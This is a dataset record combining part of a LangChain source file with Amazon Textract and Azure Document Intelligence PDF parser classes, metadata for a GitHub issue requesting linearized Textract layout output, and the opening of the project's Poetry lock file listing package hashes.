""" def __init__( self, textract_features: Optional[Sequence[int]] = None, client: Optional[Any] = None, ) -> None: """Initializes the parser. Args: textract_features: Features to be used for extraction, each feature should be passed as an int that conforms to the enum `Textract_Features`, see `amazon-textract-caller` pkg client: boto3 textract client """ try: import textractcaller as tc self.tc = tc if textract_features is not None: self.textract_features = [ tc.Textract_Features(f) for f in textract_features ] else: self.textract_features = [] except ImportError: raise ImportError( "Could not import amazon-textract-caller python package. " "Please install it with `pip install amazon-textract-caller`." ) if not client: try: import boto3 self.boto3_textract_client = boto3.client("textract") except ImportError: raise ImportError( "Could not import boto3 python package. " "Please install it with `pip install boto3`." ) else: self.boto3_textract_client = client def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Iterates over the Blob pages and returns an Iterator with a Document for each page, like the other parsers If multi-page document, blob.path has to be set to the S3 URI and for single page docs the blob.data is taken """ url_parse_result = urlparse(str(blob.path)) if blob.path else None # Either call with S3 path (multi-page) or with bytes (single-page) if ( url_parse_result and url_parse_result.scheme == "s3" and url_parse_result.netloc ): textract_response_json = self.tc.call_textract( input_document=str(blob.path), features=self.textract_features, boto3_textract_client=self.boto3_textract_client, ) else: textract_response_json = self.tc.call_textract( input_document=blob.as_bytes(), features=self.textract_features, call_mode=self.tc.Textract_Call_Mode.FORCE_SYNC, boto3_textract_client=self.boto3_textract_client, ) current_text = "" current_page = 1 for block in textract_response_json["Blocks"]: if "Page" in block and not (int(block["Page"]) == current_page): yield Document( page_content=current_text, metadata={"source": blob.source, "page": current_page}, ) current_text = "" current_page = int(block["Page"]) if "Text" in block: current_text += block["Text"] + " " yield Document( page_content=current_text, metadata={"source": blob.source, "page": current_page}, ) class DocumentIntelligenceParser(BaseBlobParser): """Loads a PDF with Azure Document Intelligence (formerly Forms Recognizer) and chunks at character level.""" def __init__(self, client: Any, model: str): self.client = client self.model = model def _generate_docs(self, blob: Blob, result: Any) -> Iterator[Document]: for p in result.pages: content = " ".join([line.content for line in p.lines]) d = Document( page_content=content, metadata={ "source": blob.source, "page": p.page_number, }, ) yield d def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Lazily parse the blob.""" with blob.as_bytes_io() as file_obj: poller = self.client.begin_analyze_document(self.model, file_obj) result = poller.result() docs = self._generate_docs(blob, result) yield from docs
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
12,068
feat: Add Linearized output to Textract PDFLoader
### Feature request Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies different layout elements like tables, lists, figures, text-paragraphs and titles. This should be used by the AmazonTextractPDFParser to generate a linearized output to improve downstream LLMs accuracy with those hints. Text output should render tables and key/value pairs and text in reading order for multi-column text and prefix lists with a *, when features like LAYOUT, TABLES, FORMS are passed to the textract call ### Motivation Improve downstream LLM accuracy ### Your contribution I'll submit a PR for this feature.
https://github.com/langchain-ai/langchain/issues/12068
https://github.com/langchain-ai/langchain/pull/12446
a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445
0c7f1d8b219e87e3ffd14a15a452622c532c7e95
"2023-10-20T08:28:07Z"
python
"2023-10-31T01:02:10Z"
libs/langchain/poetry.lock
# This file is automatically @generated by Poetry 1.6.1 and should not be changed by hand. [[package]] name = "absl-py" version = "2.0.0" description = "Abseil Python Common Libraries, see https://github.com/abseil/abseil-py." optional = true python-versions = ">=3.7" files = [ {file = "absl-py-2.0.0.tar.gz", hash = "sha256:d9690211c5fcfefcdd1a45470ac2b5c5acd45241c3af71eed96bc5441746c0d5"}, {file = "absl_py-2.0.0-py3-none-any.whl", hash = "sha256:9a28abb62774ae4e8edbe2dd4c49ffcd45a6a848952a5eccc6a49f3f0fc1e2f3"}, ] [[package]] name = "aioboto3" version = "12.0.0" description = "Async boto3 wrapper" optional = true python-versions = ">=3.8,<4.0" files = [ {file = "aioboto3-12.0.0-py3-none-any.whl", hash = "sha256:23895e734f83e34827a38d3a08ccc3f4178cc8d4e3a7b7031a0cbf8efc875555"}, {file = "aioboto3-12.0.0.tar.gz", hash = "sha256:c2bbb990b4efd2e474a1e8a42a80291faf6434b2dc8678f163208d338b2dba39"}, ] [package.dependencies] aiobotocore = {version = "2.7.0", extras = ["boto3"]} [package.extras] chalice = ["chalice (>=1.24.0)"] s3cse = ["cryptography (>=2.3.1)"] [[package]] name = "aiobotocore" version = "2.7.0" description = "Async client for aws services using botocore and aiohttp" optional = true python-versions = ">=3.8" files = [ {file = "aiobotocore-2.7.0-py3-none-any.whl", hash = "sha256:aec605df77ce4635a0479b50fd849aa6b640900f7b295021ecca192e1140e551"}, {file = "aiobotocore-2.7.0.tar.gz", hash = "sha256:506591374cc0aee1bdf0ebe290560424a24af176dfe2ea7057fe1df97c4f0467"}, ] [package.dependencies] aiohttp = ">=3.7.4.post0,<4.0.0" aioitertools = ">=0.5.1,<1.0.0" boto3 = {version = ">=1.28.16,<1.28.65", optional = true, markers = "extra == \"boto3\""} botocore = ">=1.31.16,<1.31.65" wrapt = ">=1.10.10,<2.0.0" [package.extras] awscli = ["awscli (>=1.29.16,<1.29.65)"] boto3 = ["boto3 (>=1.28.16,<1.28.65)"] [[package]] name = "aiodns" version = "3.1.1" description = "Simple DNS resolver for asyncio" optional = true python-versions = "*" files = [ {file = "aiodns-3.1.1-py3-none-any.whl", hash = "sha256:a387b63da4ced6aad35b1dda2d09620ad608a1c7c0fb71efa07ebb4cd511928d"}, {file = "aiodns-3.1.1.tar.gz", hash = "sha256:1073eac48185f7a4150cad7f96a5192d6911f12b4fb894de80a088508c9b3a99"}, ] [package.dependencies] pycares = ">=4.0.0" [[package]] name = "aiofiles" version = "23.2.1" description = "File support for asyncio." optional = true python-versions = ">=3.7" files = [ {file = "aiofiles-23.2.1-py3-none-any.whl", hash = "sha256:19297512c647d4b27a2cf7c34caa7e405c0d60b5560618a29a9fe027b18b0107"}, {file = "aiofiles-23.2.1.tar.gz", hash = "sha256:84ec2218d8419404abcb9f0c02df3f34c6e0a68ed41072acfb1cef5cbc29051a"}, ] [[package]] name = "aiohttp" version = "3.8.6" description = "Async http client/server framework (asyncio)" optional = false python-versions = ">=3.6" files = [ {file = "aiohttp-3.8.6-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:41d55fc043954cddbbd82503d9cc3f4814a40bcef30b3569bc7b5e34130718c1"}, {file = "aiohttp-3.8.6-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:1d84166673694841d8953f0a8d0c90e1087739d24632fe86b1a08819168b4566"}, {file = "aiohttp-3.8.6-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:253bf92b744b3170eb4c4ca2fa58f9c4b87aeb1df42f71d4e78815e6e8b73c9e"}, {file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3fd194939b1f764d6bb05490987bfe104287bbf51b8d862261ccf66f48fb4096"}, {file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:6c5f938d199a6fdbdc10bbb9447496561c3a9a565b43be564648d81e1102ac22"}, {file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2817b2f66ca82ee699acd90e05c95e79bbf1dc986abb62b61ec8aaf851e81c93"}, {file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0fa375b3d34e71ccccf172cab401cd94a72de7a8cc01847a7b3386204093bb47"}, {file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9de50a199b7710fa2904be5a4a9b51af587ab24c8e540a7243ab737b45844543"}, {file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:e1d8cb0b56b3587c5c01de3bf2f600f186da7e7b5f7353d1bf26a8ddca57f965"}, {file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:8e31e9db1bee8b4f407b77fd2507337a0a80665ad7b6c749d08df595d88f1cf5"}, {file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:7bc88fc494b1f0311d67f29fee6fd636606f4697e8cc793a2d912ac5b19aa38d"}, {file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:ec00c3305788e04bf6d29d42e504560e159ccaf0be30c09203b468a6c1ccd3b2"}, {file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:ad1407db8f2f49329729564f71685557157bfa42b48f4b93e53721a16eb813ed"}, {file = "aiohttp-3.8.6-cp310-cp310-win32.whl", hash = "sha256:ccc360e87341ad47c777f5723f68adbb52b37ab450c8bc3ca9ca1f3e849e5fe2"}, {file = "aiohttp-3.8.6-cp310-cp310-win_amd64.whl", hash = "sha256:93c15c8e48e5e7b89d5cb4613479d144fda8344e2d886cf694fd36db4cc86865"}, {file = "aiohttp-3.8.6-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:6e2f9cc8e5328f829f6e1fb74a0a3a939b14e67e80832975e01929e320386b34"}, {file = "aiohttp-3.8.6-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:e6a00ffcc173e765e200ceefb06399ba09c06db97f401f920513a10c803604ca"}, {file = "aiohttp-3.8.6-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:41bdc2ba359032e36c0e9de5a3bd00d6fb7ea558a6ce6b70acedf0da86458321"}, {file = "aiohttp-3.8.6-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:14cd52ccf40006c7a6cd34a0f8663734e5363fd981807173faf3a017e202fec9"}, {file = "aiohttp-3.8.6-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2d5b785c792802e7b275c420d84f3397668e9d49ab1cb52bd916b3b3ffcf09ad"}, {file = "aiohttp-3.8.6-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1bed815f3dc3d915c5c1e556c397c8667826fbc1b935d95b0ad680787896a358"}, {file = "aiohttp-3.8.6-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:96603a562b546632441926cd1293cfcb5b69f0b4159e6077f7c7dbdfb686af4d"}, {file = "aiohttp-3.8.6-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d76e8b13161a202d14c9584590c4df4d068c9567c99506497bdd67eaedf36403"}, {file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:e3f1e3f1a1751bb62b4a1b7f4e435afcdade6c17a4fd9b9d43607cebd242924a"}, {file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:76b36b3124f0223903609944a3c8bf28a599b2cc0ce0be60b45211c8e9be97f8"}, {file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:a2ece4af1f3c967a4390c284797ab595a9f1bc1130ef8b01828915a05a6ae684"}, {file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:16d330b3b9db87c3883e565340d292638a878236418b23cc8b9b11a054aaa887"}, {file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:42c89579f82e49db436b69c938ab3e1559e5a4409eb8639eb4143989bc390f2f"}, {file = "aiohttp-3.8.6-cp311-cp311-win32.whl", hash = "sha256:efd2fcf7e7b9d7ab16e6b7d54205beded0a9c8566cb30f09c1abe42b4e22bdcb"}, {file = "aiohttp-3.8.6-cp311-cp311-win_amd64.whl", hash = "sha256:3b2ab182fc28e7a81f6c70bfbd829045d9480063f5ab06f6e601a3eddbbd49a0"}, {file = "aiohttp-3.8.6-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:fdee8405931b0615220e5ddf8cd7edd8592c606a8e4ca2a00704883c396e4479"}, {file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d25036d161c4fe2225d1abff2bd52c34ed0b1099f02c208cd34d8c05729882f0"}, {file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5d791245a894be071d5ab04bbb4850534261a7d4fd363b094a7b9963e8cdbd31"}, {file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0cccd1de239afa866e4ce5c789b3032442f19c261c7d8a01183fd956b1935349"}, {file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1f13f60d78224f0dace220d8ab4ef1dbc37115eeeab8c06804fec11bec2bbd07"}, {file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8a9b5a0606faca4f6cc0d338359d6fa137104c337f489cd135bb7fbdbccb1e39"}, {file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:13da35c9ceb847732bf5c6c5781dcf4780e14392e5d3b3c689f6d22f8e15ae31"}, {file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:4d4cbe4ffa9d05f46a28252efc5941e0462792930caa370a6efaf491f412bc66"}, {file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_ppc64le.whl", hash = "sha256:229852e147f44da0241954fc6cb910ba074e597f06789c867cb7fb0621e0ba7a"}, {file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_s390x.whl", hash = "sha256:713103a8bdde61d13490adf47171a1039fd880113981e55401a0f7b42c37d071"}, {file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:45ad816b2c8e3b60b510f30dbd37fe74fd4a772248a52bb021f6fd65dff809b6"}, {file = "aiohttp-3.8.6-cp36-cp36m-win32.whl", hash = "sha256:2b8d4e166e600dcfbff51919c7a3789ff6ca8b3ecce16e1d9c96d95dd569eb4c"}, {file = "aiohttp-3.8.6-cp36-cp36m-win_amd64.whl", hash = "sha256:0912ed87fee967940aacc5306d3aa8ba3a459fcd12add0b407081fbefc931e53"}, {file = "aiohttp-3.8.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:e2a988a0c673c2e12084f5e6ba3392d76c75ddb8ebc6c7e9ead68248101cd446"}, {file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ebf3fd9f141700b510d4b190094db0ce37ac6361a6806c153c161dc6c041ccda"}, {file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3161ce82ab85acd267c8f4b14aa226047a6bee1e4e6adb74b798bd42c6ae1f80"}, {file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d95fc1bf33a9a81469aa760617b5971331cdd74370d1214f0b3109272c0e1e3c"}, {file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6c43ecfef7deaf0617cee936836518e7424ee12cb709883f2c9a1adda63cc460"}, {file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ca80e1b90a05a4f476547f904992ae81eda5c2c85c66ee4195bb8f9c5fb47f28"}, {file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:90c72ebb7cb3a08a7f40061079817133f502a160561d0675b0a6adf231382c92"}, {file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:bb54c54510e47a8c7c8e63454a6acc817519337b2b78606c4e840871a3e15349"}, {file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:de6a1c9f6803b90e20869e6b99c2c18cef5cc691363954c93cb9adeb26d9f3ae"}, {file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:a3628b6c7b880b181a3ae0a0683698513874df63783fd89de99b7b7539e3e8a8"}, {file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:fc37e9aef10a696a5a4474802930079ccfc14d9f9c10b4662169671ff034b7df"}, {file = "aiohttp-3.8.6-cp37-cp37m-win32.whl", hash = "sha256:f8ef51e459eb2ad8e7a66c1d6440c808485840ad55ecc3cafefadea47d1b1ba2"}, {file = "aiohttp-3.8.6-cp37-cp37m-win_amd64.whl", hash = "sha256:b2fe42e523be344124c6c8ef32a011444e869dc5f883c591ed87f84339de5976"}, {file = "aiohttp-3.8.6-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:9e2ee0ac5a1f5c7dd3197de309adfb99ac4617ff02b0603fd1e65b07dc772e4b"}, {file = "aiohttp-3.8.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:01770d8c04bd8db568abb636c1fdd4f7140b284b8b3e0b4584f070180c1e5c62"}, {file = "aiohttp-3.8.6-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:3c68330a59506254b556b99a91857428cab98b2f84061260a67865f7f52899f5"}, {file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:89341b2c19fb5eac30c341133ae2cc3544d40d9b1892749cdd25892bbc6ac951"}, {file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:71783b0b6455ac8f34b5ec99d83e686892c50498d5d00b8e56d47f41b38fbe04"}, {file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f628dbf3c91e12f4d6c8b3f092069567d8eb17814aebba3d7d60c149391aee3a"}, {file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b04691bc6601ef47c88f0255043df6f570ada1a9ebef99c34bd0b72866c217ae"}, {file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7ee912f7e78287516df155f69da575a0ba33b02dd7c1d6614dbc9463f43066e3"}, {file = "aiohttp-3.8.6-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:9c19b26acdd08dd239e0d3669a3dddafd600902e37881f13fbd8a53943079dbc"}, {file = "aiohttp-3.8.6-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:99c5ac4ad492b4a19fc132306cd57075c28446ec2ed970973bbf036bcda1bcc6"}, {file = "aiohttp-3.8.6-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:f0f03211fd14a6a0aed2997d4b1c013d49fb7b50eeb9ffdf5e51f23cfe2c77fa"}, {file = "aiohttp-3.8.6-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:8d399dade330c53b4106160f75f55407e9ae7505263ea86f2ccca6bfcbdb4921"}, {file = "aiohttp-3.8.6-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:ec4fd86658c6a8964d75426517dc01cbf840bbf32d055ce64a9e63a40fd7b771"}, {file = "aiohttp-3.8.6-cp38-cp38-win32.whl", hash = "sha256:33164093be11fcef3ce2571a0dccd9041c9a93fa3bde86569d7b03120d276c6f"}, {file = "aiohttp-3.8.6-cp38-cp38-win_amd64.whl", hash = "sha256:bdf70bfe5a1414ba9afb9d49f0c912dc524cf60141102f3a11143ba3d291870f"}, {file = "aiohttp-3.8.6-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:d52d5dc7c6682b720280f9d9db41d36ebe4791622c842e258c9206232251ab2b"}, {file = "aiohttp-3.8.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:4ac39027011414dbd3d87f7edb31680e1f430834c8cef029f11c66dad0670aa5"}, {file = "aiohttp-3.8.6-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:3f5c7ce535a1d2429a634310e308fb7d718905487257060e5d4598e29dc17f0b"}, {file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b30e963f9e0d52c28f284d554a9469af073030030cef8693106d918b2ca92f54"}, {file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:918810ef188f84152af6b938254911055a72e0f935b5fbc4c1a4ed0b0584aed1"}, {file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:002f23e6ea8d3dd8d149e569fd580c999232b5fbc601c48d55398fbc2e582e8c"}, {file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4fcf3eabd3fd1a5e6092d1242295fa37d0354b2eb2077e6eb670accad78e40e1"}, {file = "aiohttp-3.8.6-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:255ba9d6d5ff1a382bb9a578cd563605aa69bec845680e21c44afc2670607a95"}, {file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:d67f8baed00870aa390ea2590798766256f31dc5ed3ecc737debb6e97e2ede78"}, {file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:86f20cee0f0a317c76573b627b954c412ea766d6ada1a9fcf1b805763ae7feeb"}, {file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:39a312d0e991690ccc1a61f1e9e42daa519dcc34ad03eb6f826d94c1190190dd"}, {file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:e827d48cf802de06d9c935088c2924e3c7e7533377d66b6f31ed175c1620e05e"}, {file = "aiohttp-3.8.6-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:bd111d7fc5591ddf377a408ed9067045259ff2770f37e2d94e6478d0f3fc0c17"}, {file = "aiohttp-3.8.6-cp39-cp39-win32.whl", hash = "sha256:caf486ac1e689dda3502567eb89ffe02876546599bbf915ec94b1fa424eeffd4"}, {file = "aiohttp-3.8.6-cp39-cp39-win_amd64.whl", hash = "sha256:3f0e27e5b733803333bb2371249f41cf42bae8884863e8e8965ec69bebe53132"}, {file = "aiohttp-3.8.6.tar.gz", hash = "sha256:b0cf2a4501bff9330a8a5248b4ce951851e415bdcce9dc158e76cfd55e15085c"}, ] [package.dependencies] aiosignal = ">=1.1.2" async-timeout = ">=4.0.0a3,<5.0" attrs = ">=17.3.0" charset-normalizer = ">=2.0,<4.0" frozenlist = ">=1.1.1" multidict = ">=4.5,<7.0" yarl = ">=1.0,<2.0" [package.extras] speedups = ["Brotli", "aiodns", "cchardet"] [[package]] name = "aiohttp-retry" version = "2.8.3" description = "Simple retry client for aiohttp" optional = true python-versions = ">=3.7" files = [ {file = "aiohttp_retry-2.8.3-py3-none-any.whl", hash = "sha256:3aeeead8f6afe48272db93ced9440cf4eda8b6fd7ee2abb25357b7eb28525b45"}, {file = "aiohttp_retry-2.8.3.tar.gz", hash = "sha256:9a8e637e31682ad36e1ff9f8bcba912fcfc7d7041722bc901a4b948da4d71ea9"}, ] [package.dependencies] aiohttp = "*" [[package]] name = "aioitertools" version = "0.11.0" description = "itertools and builtins for AsyncIO and mixed iterables" optional = true python-versions = ">=3.6" files = [ {file = "aioitertools-0.11.0-py3-none-any.whl", hash = "sha256:04b95e3dab25b449def24d7df809411c10e62aab0cbe31a50ca4e68748c43394"}, {file = "aioitertools-0.11.0.tar.gz", hash = "sha256:42c68b8dd3a69c2bf7f2233bf7df4bb58b557bca5252ac02ed5187bbc67d6831"}, ] [package.dependencies] typing_extensions = {version = ">=4.0", markers = "python_version < \"3.10\""} [[package]] name = "aiosignal" version = "1.3.1" description = "aiosignal: a list of registered asynchronous callbacks" optional = false python-versions = ">=3.7" files = [ {file = "aiosignal-1.3.1-py3-none-any.whl", hash = "sha256:f8376fb07dd1e86a584e4fcdec80b36b7f81aac666ebc724e2c090300dd83b17"}, {file = "aiosignal-1.3.1.tar.gz", hash = "sha256:54cd96e15e1649b75d6c87526a6ff0b6c1b0dd3459f43d9ca11d48c339b68cfc"}, ] [package.dependencies] frozenlist = ">=1.1.0" [[package]] name = "aiosqlite" version = "0.19.0" description = "asyncio bridge to the standard sqlite3 module" optional = true python-versions = ">=3.7" files = [ {file = "aiosqlite-0.19.0-py3-none-any.whl", hash = "sha256:edba222e03453e094a3ce605db1b970c4b3376264e56f32e2a4959f948d66a96"}, {file = "aiosqlite-0.19.0.tar.gz", hash = "sha256:95ee77b91c8d2808bd08a59fbebf66270e9090c3d92ffbf260dc0db0b979577d"}, ] [package.extras] dev = ["aiounittest (==1.4.1)", "attribution (==1.6.2)", "black (==23.3.0)", "coverage[toml] (==7.2.3)", "flake8 (==5.0.4)", "flake8-bugbear (==23.3.12)", "flit (==3.7.1)", "mypy (==1.2.0)", "ufmt (==2.1.0)", "usort (==1.0.6)"] docs = ["sphinx (==6.1.3)", "sphinx-mdinclude (==0.5.3)"] [[package]] name = "aleph-alpha-client" version = "2.17.0" description = "python client to interact with Aleph Alpha api endpoints" optional = true python-versions = "*" files = [ {file = "aleph-alpha-client-2.17.0.tar.gz", hash = "sha256:c2d664c7b829f4932306153bec45e11c08e03252f1dbfd9f48584c402d7050a3"}, {file = "aleph_alpha_client-2.17.0-py3-none-any.whl", hash = "sha256:9106a36a5e08dba6aea2b0b2a0de6ff0c3bb77926edc98226debae121b0925e2"}, ] [package.dependencies] aiodns = ">=3.0.0" aiohttp = ">=3.8.3" aiohttp-retry = ">=2.8.3" Pillow = ">=9.2.0" requests = ">=2.28" tokenizers = ">=0.13.2" typing-extensions = ">=4.5.0" urllib3 = ">=1.26" [package.extras] dev = ["black", "ipykernel", "mypy", "nbconvert", "pytest", "pytest-aiohttp", "pytest-cov", "pytest-dotenv", "pytest-httpserver", "types-Pillow", "types-requests"] docs = ["sphinx", "sphinx-rtd-theme"] test = ["pytest", "pytest-aiohttp", "pytest-cov", "pytest-dotenv", "pytest-httpserver"] types = ["mypy", "types-Pillow", "types-requests"] [[package]] name = "altair" version = "4.2.2" description = "Altair: A declarative statistical visualization library for Python." optional = true python-versions = ">=3.7" files = [ {file = "altair-4.2.2-py3-none-any.whl", hash = "sha256:8b45ebeaf8557f2d760c5c77b79f02ae12aee7c46c27c06014febab6f849bc87"}, {file = "altair-4.2.2.tar.gz", hash = "sha256:39399a267c49b30d102c10411e67ab26374156a84b1aeb9fcd15140429ba49c5"}, ] [package.dependencies] entrypoints = "*" jinja2 = "*" jsonschema = ">=3.0" numpy = "*" pandas = ">=0.18" toolz = "*" [package.extras] dev = ["black", "docutils", "flake8", "ipython", "m2r", "mistune (<2.0.0)", "pytest", "recommonmark", "sphinx", "vega-datasets"] [[package]] name = "amadeus" version = "9.0.0" description = "Python module for the Amadeus travel APIs" optional = true python-versions = ">=3.4.8" files = [ {file = "amadeus-9.0.0.tar.gz", hash = "sha256:d19805e19d699d2633911c5b52400f82c6719676cc1488f8ccf344dbc4eb3202"}, ] [[package]] name = "amazon-textract-caller" version = "0.2.1" description = "Amazon Textract Caller tools" optional = true python-versions = ">=3.6" files = [ {file = "amazon-textract-caller-0.2.1.tar.gz", hash = "sha256:7a531ba4841fb64718b9430c05796958b426f41a4d674d4996f9e56cd3849f4e"}, {file = "amazon_textract_caller-0.2.1-py2.py3-none-any.whl", hash = "sha256:ccdeb364e02ce7c2034b69c09209954e995a0ee19f5d3dea79f25171a9565c37"}, ] [package.dependencies] amazon-textract-response-parser = ">=0.1.39" boto3 = ">=1.26.35" botocore = "*" [package.extras] testing = ["amazon-textract-response-parser", "pytest"] [[package]] name = "amazon-textract-response-parser" version = "1.0.1" description = "Easily parse JSON returned by Amazon Textract." optional = true python-versions = ">=3.8" files = [ {file = "amazon-textract-response-parser-1.0.1.tar.gz", hash = "sha256:d9ddedb75d12c9f5dc7cf65811c96c3934c0dfa8ef76543882cc1077618a301f"}, {file = "amazon_textract_response_parser-1.0.1-py2.py3-none-any.whl", hash = "sha256:890eba2c6bc33f4088c08c4df93088cd540896eca3243b7612635ea456f759c7"}, ] [package.dependencies] boto3 = "*" marshmallow = ">=3.14,<4" [[package]] name = "anthropic" version = "0.3.11" description = "Client library for the anthropic API" optional = false python-versions = ">=3.7,<4.0" files = [ {file = "anthropic-0.3.11-py3-none-any.whl", hash = "sha256:5c81105cd9ee7388bff3fdb739aaddedc83bbae9b95d51c2d50c13b1ad106138"}, {file = "anthropic-0.3.11.tar.gz", hash = "sha256:2e0fa5351c9b368cbed0bbd7217deaa9409b82b56afaf244e2196e99eb4fe20e"}, ] [package.dependencies] anyio = ">=3.5.0,<4" distro = ">=1.7.0,<2" httpx = ">=0.23.0,<1" pydantic = ">=1.9.0,<3" tokenizers = ">=0.13.0" typing-extensions = ">=4.5,<5" [[package]] name = "anyio" version = "3.7.1" description = "High level compatibility layer for multiple asynchronous event loop implementations" optional = false python-versions = ">=3.7" files = [ {file = "anyio-3.7.1-py3-none-any.whl", hash = "sha256:91dee416e570e92c64041bd18b900d1d6fa78dff7048769ce5ac5ddad004fbb5"}, {file = 